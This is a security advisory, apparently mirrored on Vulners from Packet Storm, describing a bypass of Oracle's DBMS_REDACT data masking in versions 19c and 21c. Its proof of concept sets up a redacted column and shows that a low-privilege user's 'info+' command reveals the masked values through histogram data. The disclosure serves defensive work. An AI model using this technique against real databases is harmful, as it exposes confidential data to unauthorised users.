Vulners
Lucene search
Oracle DBMS_REDACT Dynamic Data Masking Bypass
🗓️ 03 Jan 2023 00:00:00Reported by Emad Al-MousaType 
packetstorm🔗 packetstormsecurity.com👁 269 Views
`Title: ByPassing DBMS_REDACT Dynamic Data Masking security feature in Oracle database system
Product: Database
Manufacturer: Oracle
Affected Version(s): 19c,21c
Tested Version(s): 19c,21c
CVE Reference: N/A
Author of Advisory: Emad Al-Mousa
Overview:
DBMS_REDACT package provides an interface to Oracle Data Redaction, which enables you to mask (redact) data that is returned from SQL queries. Basically, its dynamic data masking. security policies are configured and enabled through dbms_redact package.
This is a security feature but doesn't provide a bullet proof data protection, as I will simulate how easily it can be bypassed and masked datacan be extracted/viewed.
**************************************************
Proof of Concept (PoC):
In the database I will create a table called HR.TABLE2 and will create an index on SALES column and insert dummy tables.
SQL> CREATE TABLE HR.TABLE2( COMPANY_NAME VARCHAR2(10 BYTE), REGION VARCHAR2(10 BYTE), SALES NUMBER(12), DIVISION_NAME VARCHAR2(12));
SQL> CREATE INDEX HR.IDX_TABLE2_SALES ON HR.TABLE2(SALES);
SQL> Insert into HR.TABLE2 values ('COMPANY_A','EU',120000000,'INDUSTRIAL');
SQL> Insert into HR.TABLE2 values ('COMPANY_B','ASIA',170000000,'RETAIL');
SQL> Insert into HR.TABLE2 values ('COMPANY_C','ME',40000000,'SHIPMENT');
SQL> Insert into HR.TABLE2 values ('COMPANY_D','AFRICA',11000000,'FARMING');
SQL> Insert into HR.TABLE2 values ('COMPANY_E','LATIN-AM',114000000,'SHIPMENT');
SQL> Insert into HR.TABLE2 values ('COMPANY_F','NORTH-AM',190000000,'RETAIL');
SQL> commit;
I will create a redaction policy as SYS user against “SALES” column in the table HR.TABLE2:
sqlplus / as sysdba
SQL> begin dbms_redact.add_policy( object_schema => 'HR', object_name => 'TABLE2', column_name => 'SALES', policy_name => 'REDACT_HR_SALES', function_type => DBMS_REDACT.FULL, expression => '1=1'); end;/
I will create a user called "roro" in the pluggable database ORCLPDB1 with “create session” and "SELECT" permission ONLY on the table:
sqlplus / as sysdba
SQL> alter session set container=ORCLPDB1;SQL> create user roro identified by dummy_123;SQL> grant select on HR.TABLE2 to roro;
connecting using account roro to the database using "SQL Developer Tool" or SQLCL and execute the following command:
info+ HR.TABLE2;
The histogram data for SALES column will show the actual vaules stored in the redacted column.
Conclusion: So the security feature was bypassed with no excessive privileges required to be granted to the database account, I utilized the info+ command only.
**************************************************
References:
https://docs.oracle.com/database/121/ASOAG/introduction-to-oracle-data-redaction.htm#ASOAG852
https://databasesecurityninja.wordpress.com/2023/01/03/bypassing-dbms_redact-dynamic-data-masking-security-feature-in-oracle-database-system/
Thanks,Emad
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jan 2023 00:00Current
7.4High risk
Vulners AI Score7.4